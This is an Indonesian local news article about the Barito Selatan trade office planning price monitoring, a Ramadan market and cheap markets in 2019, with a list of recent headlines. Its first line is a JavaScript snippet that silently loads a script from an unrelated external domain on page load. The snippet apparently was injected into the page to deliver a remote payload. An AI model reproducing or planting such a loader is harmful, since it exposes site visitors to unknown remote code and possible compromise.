(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Jelang Ramadhan, Disdagkop Barsel Pantau Lonjakan Harga Sembako


BUNTOK, Jelang bulan Ramadhan, Dinas Perdagangan Koperasi dan UKM Barito Selatan (Barsel) akan memantau harga kebutuhan pokok yang ada dipasaran.

Kepala Disdagkop dan UKM Barsel, Swita Minarsih mengatakan, pihaknya dalam waktu dekat ini akan melakukan pemantaun harga barang baik sembako atau kebutuhan pokok lainnya.

“Mengingat sebentar lagi memasuki bulan Ramadhan, kita lakukan ini untuk antisipasi lonjakan harga yang berlebihan,” kata Swita kepada Kanalkalimantan.com, Jum’at (26/4/2019).

Ia mengungkapkan, memasuki bulan Ramadhan juga telah menyiapkan lokasi pasar Ramadhan yang mana waktu pembukaannya nanti mengikuti waktu awal puasa ditetapkan.

“Jadi lewat pasar Ramadhan nanti selain tempat untuk mencari makanan berbuka juga bisa menjadi tempat wisata kuliner bagi masyarakat Barsel,” ujar Swita.

Terkait untuk antisipasi lonjakan harga saat bulan Ramadhan dan juga saat mendekati hari raya Idul Fitri nanti, pihaknya akan melaksanakan pasar murah atau pasar penyeimbang untuk masyarakat Barsel.

“Besar harapan kita kiranya pasar murah sebagai pasar penyeimbang ini bisa membantu masyarakat Barsel, terlebih untuk masyarakat yang memang betul membutuhkan,” ucap Swita.

Ditambahkan olehnya sekaligus berharap partisifasi dari masyarakat Barsel untuk bisa juga ikut serta dalam masalah pemantaun lonjakan harga ini.

“Kita akan bersama-sama nanti memantau harga ini dan semoga harga barang nantinya bisa seimbang dan jika memang ada lonjakan harga kiranya tidak terlalu signifikan naiknya,” pungkas Swita. (digdo)

Reporter:Digdo
Editor:bie

Desy Arfianty

Recent Posts

KPU Banjarbaru Terima 96 Pendaftar Calon PPK

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima 96 pendaftar calon anggota Panitia… Read More

29 menit ago

Sejarah 1 Mei 1952 : Dari Afdeeling Amoentai Menjadi Kabupaten Hulu Sungai Utara

KANALKALIMANTAN.COM, AMUNTAI - Tepat hari ini Rabu 1 Mei 2024, 72 tahun silam atau tepatnya… Read More

44 menit ago

PLN Gelar Halalbihalal Bersama Anak-anak Panti Asuhan

KANALKALIMANTAN.COM, PONTIANAK - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

2 jam ago

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

14 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

15 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

16 jam ago

This website uses cookies.